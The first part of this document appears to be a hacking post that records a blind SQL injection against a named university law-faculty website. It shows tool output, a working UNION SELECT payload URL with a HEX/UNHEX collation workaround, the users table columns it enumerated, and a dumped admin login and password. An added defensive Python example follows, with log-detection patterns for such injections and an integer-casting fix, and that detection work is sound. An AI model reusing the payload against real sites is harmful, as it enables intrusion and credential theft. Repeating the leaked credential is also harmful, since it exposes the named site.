Problem: where is the admin dir?
Tool: blindext.py (schemafuzz.py can't do it because of the restriction below)
[+] URL: http://www.law.ui.ac.id/berita.php?bid=380
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 15:08:22
[0]: 4.1.11-Debian_4sarge8-log:wwwlaw:wwwlaw
Database information = http://www.law.ui.ac.id/berita.php?bid=-380+union+select+1,2,UNHEX(HEX(concat_ws(char(58),database(),version(),user()))),4,5,6--
I use UNHEX & HEX because there is a conversion error if you don't use this "trick". The error message is: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Dump:
[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[14:30:33] StartTime
[+] Fuzzing Tables...
[Table]:users
[Column]:user_name
[Column]:user_password
[Column]:user_login
[Column]:user_id
[14:31:48] EndTime
[-] Total URL Requests 226
[-] Done
[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Dumping data from database "WWWLAW" Table "users"
[+] Column(s) ['user_login', 'user_password']
[+] 14:57:25
[+] Number of Rows: 4
[0]: admin:admiN
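Seen from the defender's side, both the requests and the collation error shown above leave clear traces in web and application logs. The following is an added example, not part of the original post or of the tools it uses; the log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log entries (client IP, request target); not real traffic.
# Addresses come from the documentation ranges; the path and payload shape are the page's.
SAMPLE_LOG = [
    ("198.51.100.7", "/berita.php?bid=380"),
    ("192.0.2.10", "/berita.php?bid=-380+union+select+1,2,UNHEX(HEX(concat_ws("
                   "char(58),database(),version(),user()))),4,5,6--"),
    ("192.0.2.10", "/berita.php?bid=380%20UNION%20SELECT%201,2,3"),
    ("198.51.100.7", "/berita.php?bid=381"),
]

# Error text quoted on the page; in an application error log it means a UNION
# was appended to a query whose columns use a different collation.
SAMPLE_ERROR = ("Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and "
                "(utf8_general_ci,SYSCONST) for operation 'UNION'")

SQLI = re.compile(r"\bunion\b.*\bselect\b|\bunhex\s*\(|\bconcat_ws\s*\(|--",
                  re.IGNORECASE | re.DOTALL)

def classify(target, param="bid"):
    """Return the reasons a request looks like injection (empty list = clean)."""
    # parse_qs URL-decodes the value, so '+' and '%20' both become spaces.
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, [])
    reasons = set()
    for value in values:
        if not re.fullmatch(r"\d{1,10}", value):  # the id should be a plain integer
            reasons.add("non-integer id")
        if SQLI.search(value):
            reasons.add("sql keyword")
    return sorted(reasons)

def flag_clients(log, param="bid"):
    """Count suspicious requests per client IP (hypothetical helper)."""
    hits = Counter()
    for ip, target in log:
        if classify(target, param):
            hits[ip] += 1
    return dict(hits)

def error_is_union_probe(message):
    """True when a DB error line shows a UNION hitting a collation mismatch."""
    return "Illegal mix of collations" in message and "operation 'UNION'" in message

if __name__ == "__main__":
    print(flag_clients(SAMPLE_LOG), error_is_union_probe(SAMPLE_ERROR))
```

The same integer check that `classify` applies to logs is the fix at the source: casting `bid` to an integer or binding it as a query parameter makes every request in the dump above return nothing.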